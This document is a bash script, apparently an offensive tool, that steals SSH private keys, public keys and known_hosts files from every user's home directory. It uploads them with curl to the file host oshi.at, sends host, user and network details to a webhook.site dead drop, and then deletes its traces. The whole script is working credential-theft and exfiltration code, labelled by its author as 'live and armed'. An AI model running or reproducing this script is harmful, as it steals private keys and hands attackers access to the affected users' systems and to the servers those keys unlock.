ssh-exfil.sh

1. #!/usr/bin/env bash
2. #   Keeping it portable.
3. #   see:    https://www.cyberciti.biz/tips/finding-bash-perl-python-portably-using-env.html
4.  
5.  
6.  
7. ### FAIR WARNING!
8. ##  THIS SCRIPT IS LIVE AND ARMED!
9. #   DO NOT USE ON PRODUCTION SYSTEMS!!
10. ##  THIS SCRIPT NEEDS TO BE ADAPTED AT LINE 96!
11. #   OTHERWISE IT WILL BREAK!
12.  
13.  
14.  
15. ##  Preparation
16.  
17. mkdir ./ssh-exfil
18. #   creating a working directory
19.  
20.  
21.  
22. ##      collecting the ssh keys, pubkeys and known-hosts
23.  
24.     rsync -a --prune-empty-dirs --include '*/' --include 'id_*' --include 'known_hosts' --exclude '*' /home ./ssh-exfil
25. #       find all ssh-keys, ssh-pubkeys and known-hosts files for users and copy them into the subfolder ./ssh-exfil
26. #       see also:   https://unix.stackexchange.com/questions/83593/copy-specific-file-type-keeping-the-folder-structure/83596#83596
27.  
28.  
29.  
30. ##      basic cleanup
31.  
32.     for i in $(find . -name ".ssh" -type d)
33.         do
34.             cd $i
35.             cd ./..
36.             mv .ssh ssh
37.             cd ./..
38.             cd ./..
39.     done
40. #   rename all extracted ".ssh" subfolders into "ssh" so that they ain't hidden anymore
41. #   see :   https://stackoverflow.com/a/31478604
42. #           https://securitronlinux.com/debian-testing/renaming-folders-with-a-loop-in-bash-is-easy/
43. #           https://linuxize.com/post/how-to-rename-directories-in-linux/
44.  
45.  
46.  
47. ##  getting ready to exfiltrate
48.  
49. tar cfv ssh-exfil.tar ./ssh-exfil/
50. #   pack the exfiltrated data into a tarball
51.  
52. rm -rf ./ssh-exfil
53. #   remove the working directory
54.  
55.  
56.  
57. ##  exfiltrate the file
58.  
59. touch ./work.log
60. #   creating logfile
61. #   see:    https://unix.stackexchange.com/questions/61931/redirect-all-subsequent-commands-stderr-using-exec/61932#61932
62. {
63.     curl https://oshi.at -F f=@./ssh-exfil.tar
64. #       Transfers file to oshi.at using curl POST
65. #           This could also be done with any other service
66. #       see :   https://oshi.at/cmd
67. #               https://github.com/somenonymous/OshiUpload
68.  
69.     curl ipinfo.io/ip
70. #       determining public IP adress
71. #       see:    https://stackoverflow.com/questions/14594151/methods-to-detect-public-ip-address-in-bash#14594304
72.  
73.     echo ""
74. #       inserting a linke break
75.    
76.  
77.     fqn=$(host -TtA $(hostname -s)|grep "has address"|awk '{print $1}') ; \
78.     if [[ "${fqn}" == "" ]] ; then fqn=$(hostname -s) ; fi ; \
79.     echo "${fqn}"
80. #       Find the FQDN of the machine.
81. #       see:    https://serverfault.com/questions/367141/how-to-get-the-fully-qualified-name-fqn-on-unix-in-a-bash-script/367682#367682
82.  
83.     whoami
84. #       Find the current user running it.
85.  
86.     ip link && ip neigh && ip route && ip rule && ip maddress && ip address
87. #       Collecting further network info
88.  
89. } 2>&1 | tee -a ./work.log
90. #   closing the log and saving it
91.  
92.  
93.  
94. ##  Dead-drop the upload and related info on a server
95. #   See:    https://en.wikipedia.org/wiki/Dead_drop#Modern_techniques
96. #           https://en.wikipedia.org/wiki/Foldering
97.  
98. #   this upload will be < 1kB in size, so it's perfectly fine with a lot of free API testing tools.
99. curl https://webhook.site/REDACTED-TO-BE-PERSONALIZED -F f=@./work.log
100. #   This will submit the link of the uploaded file as HTTP POST request to webhook.site
101. #   See:    https://webhook.site/
102. #           https://linux.die.net/man/1/curl
103. #           curl manpages
104.  
105. #   Another option would be to use wsend:
106. #   See:    https://github.com/abemassry/wsend/issues/21#issuecomment-1048395716
107. #   Tho I'd seriously disrecommend it for said purpose.
108.  
109.  
110. ##  cleanup
111. #   removing all remaining files
112. rm ./ssh-exfil.tar
113. rm ./work.log
114.  
115. #   closing script
116. exit